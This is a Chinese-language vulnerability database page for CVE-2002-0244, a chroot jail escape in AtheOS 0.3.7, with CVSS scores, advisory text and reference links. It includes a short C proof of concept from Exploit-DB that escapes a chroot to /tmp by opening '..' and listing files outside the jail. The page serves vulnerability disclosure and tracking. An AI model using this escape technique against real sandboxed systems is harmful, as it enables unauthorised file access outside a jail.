CVE-2002-0244
CVSS7.5
发布时间 :2002-05-29 00:00:00
修订时间 :2016-10-17 22:17:32
NMCOES    

[原文]Directory traversal vulnerability in chroot function in AtheOS 0.3.7 allows attackers to escape the jail via a .. (dot dot) in the pathname argument to chdir.


[CNNVD]AtheOS修改根相关路径目录逃避漏洞(CNNVD-200205-107)

        AtheOS 0.3.7的chroot函数存在目录遍历漏洞。攻击者可以借助chdir中pathname参数的..(点 点)逃避监控。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0244
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0244
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-107
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101310622531303&w=2
(UNKNOWN)  BUGTRAQ  20020207 AtheOS: escaping from a chroot jail
http://www.securityfocus.com/bid/4051
(UNKNOWN)  BID  4051
http://xforce.iss.net/xforce/xfdb/8108
(UNKNOWN)  XF  atheos-dot-directory-traversal(8108)

- 漏洞信息

AtheOS修改根相关路径目录逃避漏洞
高危 路径遍历
2002-05-29 00:00:00 2005-10-20 00:00:00
本地  
        AtheOS 0.3.7的chroot函数存在目录遍历漏洞。攻击者可以借助chdir中pathname参数的..(点 点)逃避监控。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21282)

AtheOS 0.3.7 Change Root Relative Path Directory Escaping Vulnerability (EDBID:21282)
AtheOS local
2002-02-07 Verified
0 Jedi/Sector
N/A [点击下载]
source: http://www.securityfocus.com/bid/4051/info

AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.

It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process. 

#include <stdio.h>
#include <unistd.h>
#include <dirent.h>

int main(void)
{
    register DIR *d;
    register const struct dirent *e;

    if (chdir("/") || chroot("/tmp") || chdir("/") ||
        (d = opendir("..")) == NULL) {
        return 1;
    }
    while ((e = readdir(d)) != NULL) {
        puts(e->d_name);
    }
    return 0;
}
		

- 漏洞信息

8988
AtheOS chroot() Function Local Traversal Arbitrary File Access
Local Access Required Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

AtheOS contains a flaw that may allow a malicious user to traverse directories. The issue is triggered when the chroot function fails to check relative paths against the chroot jail. It is possible that the flaw may allow access to arbitrary files resulting in a loss of confidentiality and integrity.

- 时间线

2002-02-07 Unknow
2002-02-07 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

AtheOS Change Root Relative Path Directory Escaping Vulnerability
Design Error 4051
No Yes
2002-02-07 12:00:00 2009-07-11 10:56:00
Vulnerability announced by Jedi/Sector One <j@pureftpd.org> on February 7, 2002.

- 受影响的程序版本

AtheOS AtheOS 0.3.7

- 漏洞讨论

AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.

It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process.

- 漏洞利用

Exploit contributed by Jedi/Sector One &lt;j@pureftpd.org&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站